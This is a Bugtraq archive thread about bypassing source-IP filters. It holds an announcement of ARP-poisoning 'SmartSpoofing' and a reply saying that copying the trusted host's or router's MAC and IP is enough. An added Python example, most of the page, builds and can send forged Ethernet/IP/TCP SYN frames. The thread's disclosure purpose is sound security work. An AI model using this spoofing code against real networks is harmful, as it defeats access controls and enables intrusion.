Bugtraq mailing list archives

Re: IP SmartSpoofing : How to bypass all IP filters relying on source IP address


From: "Ossian Vitek" <ian.Vitek () ixsecurity com>
Date: Thu, 31 Oct 2002 20:44:36 +0100



The only new thing is that the attacker relays the packets from the trusted
client.
This is not needed for the spoof.
The solution in the Defcon 8 presentation is far easier.
You do not need to arpspoof and NAT.
* Spoof trusted client on the same LAN:
  Just take the MAC and IP of the trusted host.
* Spoof an upstream trusted client:
  Just take the MAC of the upstream router and the IP of the
  trusted client.

Defcon 8:
http://www.defcon.org/html/defcon-8/defcon-8-post.html
Read "Full Connection Vanilla IP-Spoof" in the presentation at:
http://www.wittys.com/files/defcon_vitek.ppt

All responses containing:
1: "But on a switched environment ..."
2: "But if you take same MAC as the ..."
will be redirected to /dev/null

//Ian Vitek, iXsecurity
mailto:ian.vitek () ixsecurity com
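As an added illustration of the two cases listed in the message above (this is example code written for this archive page, not code from the posters or from the Defcon 8 presentation), the block below builds the raw Ethernet/IPv4/TCP SYN frame a "vanilla" spoofer would put on the wire: the source MAC is either the trusted host's own MAC (same LAN) or the upstream router's MAC (trusted client behind the router), and the source IP is the trusted client's address in both cases. All addresses are assumed sample values (documentation ranges 192.0.2.0/24 and 198.51.100.0/24, made-up MACs), and the function names are this example's own. The parser at the end checks that the IP and TCP checksums were computed correctly, which is the part most hand-rolled spoofers get wrong; a frame with a bad checksum is silently dropped by the target and the "spoof" never happens.

```python
"""Build and check a spoofed TCP SYN frame with a chosen source MAC and IP.

Added example for this thread (not the posters' code). Addresses below are
assumed sample values; send_frame() needs Linux AF_PACKET and CAP_NET_RAW
and is never called at import time.
"""
import socket
import struct

# Assumed sample topology (not from the original thread).
TRUSTED_IP = "192.0.2.10"            # trusted client on the same LAN
TRUSTED_MAC = "00:11:22:33:44:55"     # its MAC
UPSTREAM_TRUSTED_IP = "198.51.100.10"  # trusted client behind the router
ROUTER_MAC = "00:aa:bb:cc:dd:ee"      # upstream router's LAN-side MAC
SERVER_IP = "192.0.2.20"             # host doing IP-based access control
SERVER_MAC = "00:de:ad:be:ef:01"


def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw):
    return ":".join("%02x" % b for b in raw)


def checksum(data):
    """RFC 1071 one's-complement checksum; returns 0 for a valid header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_spoofed_syn(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq=0):
    """Ethernet + IPv4 + TCP SYN with arbitrary link- and network-layer sources."""
    eth = mac_to_bytes(dst_mac) + mac_to_bytes(src_mac) + b"\x08\x00"  # EtherType IPv4

    # TCP header: data offset 5 words, flags SYN (0x02), no options.
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 65535, 0, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp)))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]

    # IPv4 header: version/IHL 0x45, DF set, TTL 64, protocol TCP.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, socket.IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return eth + ip + tcp


def same_lan_frame():
    """Case 1: take both the MAC and the IP of the trusted host."""
    return build_spoofed_syn(TRUSTED_MAC, SERVER_MAC, TRUSTED_IP, SERVER_IP, 40000, 22)


def upstream_frame():
    """Case 2: take the upstream router's MAC and the trusted client's IP."""
    return build_spoofed_syn(ROUTER_MAC, SERVER_MAC, UPSTREAM_TRUSTED_IP, SERVER_IP, 40001, 22)


def parse_frame(frame):
    """Decode the frame and verify both checksums, as the target's stack would."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    ip = frame[14:34]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = frame[14 + ihl:14 + total_len]
    sport, dport = struct.unpack("!HH", tcp[0:4])
    pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, ip[9], len(tcp))
    return {
        "ethertype": ethertype,
        "dst_mac": bytes_to_mac(frame[0:6]),
        "src_mac": bytes_to_mac(frame[6:12]),
        "src_ip": socket.inet_ntoa(ip[12:16]),
        "dst_ip": socket.inet_ntoa(ip[16:20]),
        "sport": sport,
        "dport": dport,
        "flags": tcp[13],
        "ip_csum_ok": checksum(ip) == 0,
        "tcp_csum_ok": checksum(pseudo + tcp) == 0,
    }


def send_frame(frame, iface):
    """Put the frame on the wire (Linux only, needs CAP_NET_RAW). Not run here."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    try:
        sock.bind((iface, 0))
        sock.send(frame)
    finally:
        sock.close()


if __name__ == "__main__":
    for name, frame in (("same LAN", same_lan_frame()), ("upstream", upstream_frame())):
        print(name, parse_frame(frame))
```

Building the frame is the easy half; this block deliberately says nothing about how the server's replies get back to the spoofing host, which is the part the rest of the thread argues about.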





Hi,

In an article available at
http://www.althes.fr/ressources/avis/smartspoofing.htm, we describe a new
technique for spoofing an IP address using ARP cache poisoning and network
address translation. IP smart spoofing allows running any application with a
spoofed IP address and thus bypassing many access controls based on source IP
address. As a result, we will explain why IP-based access control is not
reliable on firewalls, routers or applications.


Regards,

Laurent Licour (llicour () althes fr) & Vincent Royer (vroyer () althes fr)
http://www.althes.fr




